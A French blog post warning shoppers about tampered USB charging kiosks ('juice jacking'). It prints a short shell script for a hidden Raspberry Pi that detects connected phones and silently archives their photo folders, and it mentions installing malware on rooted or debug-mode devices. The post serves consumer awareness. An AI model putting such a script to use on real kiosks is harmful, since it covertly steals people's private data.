[Hack] Méfiez vous des bornes de rechargement USB dans vos centres commerciaux

o-NON-MAIS-ALLO-QUOI-facebook

 

Bon début de semaine (ou mauvais)

 

Je parle là de mauvais, car c'est la pénurie ... pénurie qui impose des restrictions d'essence dans le meilleur des cas ... des stations vides dans le pire ...

 

Je n'ai pas pu aller à mon travail hier, faute d'essence, mais c'est bon j'ai fini par trouver un peu d'or noir, et donner à boire à ma voiture, dont la jauge voyait rouge ...

 

Je commence à rencontrer de plus en plus de borne de rechargement USB dans les centres commerciaux où je me promène ...
Nos précieux smartphones, à qui l'on demande monts et merveilles sont de plus en plus gourmands en matière de batterie pour pouvoir répondre à nos besoins ...

 

Nul doute que l'idée partait d'une bonne intention ...
Seulement ... voilà ...

Nous ne vivons pas dans le monde idyllique que vos parents vous ont vendu lorsque vous n’étiez encore qu'un jeune nourrisson ....

Des personnes mal intentionnées, peuvent profiter de ces espèces de placards ... où pleins de fils pendouillent, pour ajouter discrètement le leur ...

 

Capture0

Au moyen d'un simple raspberry, accroché dans le fond du rangement,  d'un simple cordon USB, votre smartphone va révéler tous ces secrets ...

Grâce à ce genre de script ...

#!/bin/sh


folder2mount="/tmp/toto"
folder2capture="DCIM"
folder2save="/tmp"
while [ 1 = 1 ]; do
Check=`mtp-detect 2>&1 | grep Model | sed -e "s/Model\://g" | xargs`
if [ "e$Check" != "e" ]; then
clear
rm -rf $folder2mount
mkdir $folder2mount
chmod 777 $folder2mount
tmp=`mtpfs -o allow_other $folder2mount 2>&1`
echo "Capturing $Check ..."
cd $folder2save
tar -czf "capture.$Check\.tar.gz" $folder2mount/*/$folder2capture 2>&1
umount mtpfs
fi
sleep 2
done

 

 

Ainsi, une personne qui ne va pas faire attention, branchera son  téléphone au mauvais cordon USB, qui pompera toutes ses données dans le meilleur des cas ...

Dans le PIRE ...

 

Et bien votre Android en mode USB debug ou rooté, votre Iphone jailbreaké ?!?
Le hacker pourra directement installer et exécuter des programmes malveillants ...

 

Le conseil du jour étant :

Ne branchez jamais un téléphone, si vous ne savez pas sur quoi ?!?

3 comments

Laisser une réponse

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.